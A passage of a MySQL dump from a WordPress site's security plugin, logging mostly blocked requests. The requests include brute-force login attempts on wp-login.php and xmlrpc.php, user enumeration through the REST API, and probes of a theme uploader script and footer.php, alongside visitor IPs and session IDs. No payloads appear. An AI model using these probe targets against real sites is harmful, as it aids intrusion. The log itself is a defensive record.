177',404,1629875832),('59.96.136.177',404,1629875893),('59.96.136.177',404,1629875954),('59.96.136.177',404,1629876015),('59.96.136.177',404,1629876076),('59.96.136.177',404,1629876137),('59.96.136.177',404,1629876198),('59.96.136.177',404,1629876260),('59.96.136.177',404,1629876320),('59.96.136.177',404,1629876382),('59.96.136.177',404,1629876442),('59.96.136.177',404,1629876503),('59.96.136.177',404,1629876565),('59.96.136.177',404,1629876625),('59.96.136.177',404,1629876686),('59.96.136.177',404,1629876748),('59.96.136.177',404,1629876808),('59.96.136.177',404,1629876870),('59.96.136.177',404,1629876931),('59.96.136.177',404,1629876991),('59.96.136.177',404,1629877052),('59.96.136.177',404,1629877113),('59.96.136.177',404,1629877174),('59.96.136.177',404,1629877235),('59.96.136.177',404,1629877296),('59.96.136.177',404,1629877357),('59.96.136.177',404,1629877418),('59.96.136.177',404,1629877479),('59.96.136.177',404,1629877540),('59.96.136.177',404,1629877601),('59.96.136.177',404,1629877662),('59.96.136.177',404,1629877723),('59.96.136.177',404,1629877785),('59.96.136.177',404,1629877845),('59.96.136.177',404,1629877906),('59.96.136.177',404,1629877967),('59.96.136.177',404,1629878028),('59.96.136.177',404,1629878089),('59.96.136.177',404,1629878150),('59.96.136.177',404,1629878211),('59.96.136.177',404,1629878272),('59.96.136.177',404,1629878333),('59.96.136.177',404,1629878395),('59.96.136.177',404,1629878455),('59.96.136.177',404,1629878516),('59.96.136.177',404,1629878577),('59.96.136.177',404,1629878638),('59.96.136.177',404,1629878699),('59.96.136.177',404,1629878760),('59.96.136.177',404,1629878821),('59.96.136.177',404,1629878882),('59.96.136.177',404,1629879248),('59.96.136.177',404,1629879309),('59.96.136.177',404,1629879370),('59.96.136.177',404,1629879431),('59.96.136.177',404,1629879492),('59.96.136.177',404,1629879553),('59.96.136.177',404,1629879615),('59.96.136.177',404,1629879675),('59.96.136.177',404,1629879736),('59.96.136.177',404,1629879797),('59.96.136.177',404,1629879858),('59.96.136.177',404,1629879920),('59.96.136.177',404,1629879980),('59.96.136.177',404,1629880041),('59.96.136.177',404,1629880102),('59.96.136.177',404,1629880163),('59.96.136.177',404,1629880225),('59.96.136.177',404,1629880285),('59.96.136.177',404,1629880346),('59.96.136.177',404,1629880407),('59.96.136.177',404,1629880468),('59.96.136.177',404,1629880529),('59.96.136.177',404,1629880590),('59.96.136.177',404,1629880651),('59.96.136.177',404,1629880712),('59.96.136.177',404,1629880773),('117.203.118.201',404,1629881139),('117.203.118.201',404,1629881201),('117.203.118.201',404,1629881262),('117.203.118.201',404,1629881322),('117.203.118.201',404,1629881383),('117.203.118.201',404,1629881445),('117.203.118.201',404,1629881505),('117.203.118.201',404,1629881568),('117.203.118.201',404,1629881627),('117.203.118.201',404,1629881688),('117.203.118.201',404,1629881750),('117.203.118.201',404,1629881810),('117.203.118.201',404,1629881871),('117.203.118.201',404,1629881932),('117.203.118.201',404,1629881993),('117.203.118.201',404,1629882055),('117.203.118.201',404,1629882116),('117.203.118.201',404,1629882176),('117.203.118.201',404,1629882237),('117.203.118.201',404,1629882298),('117.203.118.201',404,1629882360),('117.203.118.201',404,1629882420),('117.203.118.201',404,1629882481),('117.203.118.201',404,1629882542),('117.203.118.201',404,1629882603),('117.203.118.201',404,1629882665),('117.203.118.201',404,1629882725),('117.203.118.201',404,1629882786),('117.203.118.201',404,1629882848),('117.203.118.201',404,1629882908),('117.203.118.201',404,1629882969),('117.203.118.201',404,1629883030),('117.203.118.201',404,1629883030),('117.203.118.201',404,1629883091),('117.203.118.201',404,1629883152),('117.203.118.201',404,1629883213),('117.203.118.201',404,1629883275),('117.203.118.201',404,1629883335),('117.203.118.201',404,1629883396),('117.203.118.201',404,1629883457),('117.203.118.201',404,1629883518),('117.203.118.201',404,1629883581),('117.203.118.201',404,1629883640),('117.203.118.201',404,1629883640),('117.203.118.201',404,1629883702),('117.203.118.201',404,1629883762),('117.203.118.201',404,1629883823),('117.203.118.201',404,1629883884),('117.203.118.201',404,1629883945),('117.203.118.201',404,1629884006),('117.203.118.201',404,1629884067),('117.203.118.201',404,1629884128),('117.203.118.201',404,1629884190),('117.203.118.201',404,1629884190),('117.203.118.201',404,1629884250),('117.203.118.201',404,1629884311),('117.203.118.201',404,1629884375),('117.203.118.201',404,1629884433),('117.203.118.201',404,1629884495),('117.203.118.201',404,1629884496),('117.203.118.201',404,1629884557),('117.203.118.201',404,1629884616),('185.175.113.72',404,1629897305),('185.175.113.72',404,1629897319),('185.175.113.72',404,1629897320),('185.175.113.72',404,1629897320),('185.175.113.72',404,1629897321),('185.175.113.72',404,1629899047),('185.175.113.72',404,1629899050);
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
INSERT INTO `cerber_traffic` VALUES ('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','5Krj1sNW2oYafvE9HRTbOLp8',0,1629806379.0347,129,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','msg0WcZrt19yOlVi73C5e6Tx',0,1629806381.9191,108,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','ojy96gzJE3I4e17AxhVlmiPU',0,1629806411.4214,107,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','gNHv4ExbutUWlYIo8LA0OkqC',0,1629806412.1359,116,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','iGHurPgFS3ceBAEdkLlb9ZDy',0,1629806413.4497,126,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','IY3ZMprn7m6FUh2oOeGtDASQ',0,1629806414.1997,87,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','IuvYX1FBSE3MsCZLbnadGp59',0,1629806414.4004,104,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.107 Safari\\/537.36\"}','LRJ0mUXtpus7TaH9Q3qxrEjb',0,1629806435.2698,97,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','tmpk2CFq8D0zhWrGiHVb6lOL',0,1629806453.6653,109,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','tqlA6mTZHdeDGpo7vRxnJOK1',0,1629806454.9449,100,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','WTZwblNPr8EpdhY5SLUsg6XJ',0,1629806459.0902,109,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','aXIpw2L03hqoGnx7Bsg59FY8',0,1629806474.7716,137,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','ziKHkfOuXTgjoUcvqNtFehD4',0,1629806475.5386,226,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','arT3OKiX4EeSV6kfG7xRy92j',0,1629806482.9962,157,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','HIcsex4mvl0GBEtyrbRWa3PU',0,1629806484.1256,125,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','vy1c4iFeUJzXlmHxWqCoh5uf',0,1629806516.8464,99,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','rHpekwjfAKEmR9qaUBiDtoI0',0,1629806517.7806,90,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','Xvhqo1FDNOLf5uSKJrcWRix2',0,1629806518.6105,143,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','xZeUY0Wz9htsgBJNGbrEdjnF',0,1629806518.9270,101,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','wgZNkf4H0P1YxcmrlGshevJi',0,1629806661.6294,99,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','OWjHKs492wzdXeqxarMoYVfy',0,1629806662.4977,91,'','GET',404,0,700,0,1,'',0),('185.175.113.72',3115282760,'','https://www.westonspirit.org.uk/wp-login.php?redirect_to=https%3A%2F%2Fwww.westonspirit.org.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.107 Safari\\/537.36\"}','ogCbAdW5nD7SB01i6xjYGR4h',0,1629806688.9086,110,'','GET',404,0,700,0,1,'',0),('208.110.85.68',3496891716,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/34.0.1847.116 Chrome\\/34.0.1847.116 Safari\\/537.36\"}','jnv3ORma6zsAoxGibwgCQhdI',0,1629807486.1576,140,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://westonspirit.org.uk/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php','','{\"1\":\"ALittle Client\"}','SKdWTsR8PIEoQ52cGixYqN3y',0,1629808948.1340,144,'','GET',403,0,700,0,1,'',0),('5.188.62.76',96222796,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','qGs2Xxu7HEY1iDA5R3vjMPSV',0,1629811543.1116,187,'','POST',403,0,600,0,1,'',0),('69.30.244.19',1159656467,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','p9CdTJAzN4stbY2fleMSBo70',0,1629812087.6686,136,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://www.westonspirit.org.uk/wp-content/themes/twentyseventeen/footer.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','FsORB3QEX7udClve46pbZxDM',0,1629813935.1100,148,'','POST',403,0,700,0,1,'',0),('208.110.85.68',3496891716,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','AnwFoKL7rG4vqtNW3PJfzOlC',0,1629817539.3195,108,'','POST',403,0,600,0,1,'',0),('142.54.181.59',2385950011,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','wZpcM5nNT8WgYoufJdVaDKEi',0,1629819303.8705,113,'','POST',403,0,600,0,1,'',0),('63.141.251.236',1066269676,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','amRUojNAOuB2d7CLhMiwqtlx',0,1629820011.6888,111,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://www.westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','OM5GSvhVUf8gZnIed46pTamq',0,1629821602.0431,143,'','POST',403,0,600,0,1,'',0),('35.229.136.14',602245134,'','https://westonspirit.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/westonspirit.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','6CQPnljNw3p8Ibkd7iZvom0V',0,1629823496.3715,132,'','GET',403,0,520,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','BI6vGASm7w3bx1FCWZictJXT',0,1629823843.3127,404,'','POST',403,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','BIF3jfSZxK9HkoaNY4eQPcEi',0,1629823844.6594,123,'','POST',403,0,600,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','xAL9KTbVNg5QECRpP7aYMD8e',0,1629823904.3351,163,'','POST',403,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iNPFHaAQWlc1fKtTsJjxukY6',0,1629823905.4039,127,'','POST',403,0,600,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','rT1oRCfFMaP3cYHLdnGw25J7',0,1629824026.2630,207,'','POST',403,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','4fJAQIoCiavESr8u903pk6DM',0,1629824027.4502,170,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','sXbDHBxr9loI3GwF2jVg0aUd',0,1629824088.2306,101,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','BWtvI6lAyhXxQfpTRGdaVE8U',0,1629824088.5826,95,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','PtKj6fDxIpbFl957RkqmUzJX',0,1629824148.3895,151,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','blgJk60SYWOHmAtqoVF2Tei8',0,1629824148.8554,92,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','JfQ2GDCicaMzZrwqFs89Soyt',0,1629824209.9126,102,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','rRThsA8OLoi0lWNItyBwuXbc',0,1629824210.2622,92,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','cmUBlEoLtJ0qMfdYjCuIpagn',0,1629824270.3338,100,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','bUFieuOt3YCaAEdM8ry2qI0z',0,1629824270.3684,97,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','FC0Pxu7ZqhM5sk1mJ8o9OLHe',0,1629824270.6755,111,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','iJDjqmr1o70InbRYa9UOXlKv',0,1629824270.7375,114,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','nGBrEecfv0djTQDO4a25bPZ9',0,1629824331.8688,121,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','7ySLjaXoc6Der3gPOWBvNbZE',0,1629824332.2967,86,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','fUuFztpCL5i06bcZ4IKPw2QD',0,1629824392.3219,182,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','1ITNA3lr8bnBygSX60aodMDc',0,1629824392.7720,121,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','CBisVMWvH9dSb5zPnU0ufX8a',0,1629824453.9102,101,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Qwjibk0vG1L5lsn3uad2cyxU',0,1629824454.2550,95,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','Rqn9T8EHMQVeNb6wsdPtG257',0,1629824514.4042,103,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','m8xElsyNVFkK3oztpegiW6d5',0,1629824514.7738,139,'','POST',404,0,700,0,1,'',0),('69.30.244.19',1159656467,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','6a4SyiVf9hZYCeRxm2drLkQc',0,1629824549.1790,118,'','POST',403,0,600,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','3TFnicUdeKSxAbDvjCYl6asE',0,1629824575.3472,112,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','sHvGRx0t75CN3Te86hnyDjPc',0,1629824575.3894,101,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','dDr4veli8FAEuo9W51XOV2sp',0,1629824575.7201,91,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','3fT0uqQSWRdEsIialPXUpkB7',0,1629824575.7444,211,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','m1WfREaGY6c0K23Dnx7pdlIk',0,1629824636.3208,112,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','HsNFqX3nh7JomPWc4VpwdDj0',0,1629824636.7037,85,'','POST',404,0,700,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','rSyNdTGEzhWwFOf0cgYKBnVZ',0,1629824697.4422,135,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','FrWO9BcDbtU1fGE4CPT3SnzR',0,1629824697.8289,99,'','POST',404,0,700,0,1,'',0),('107.150.59.245',1805007861,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','lSiu6BIEJ0TsFvabgozNOfZ1',0,1629824747.3996,118,'','POST',403,0,600,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"}','T0CVv72qhIeky5pO9bioWXGQ',0,1629824758.9306,139,'','POST',404,0,515,0,1,'',0),('190.172.103.169',3198969769,'','https://westonspirit.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 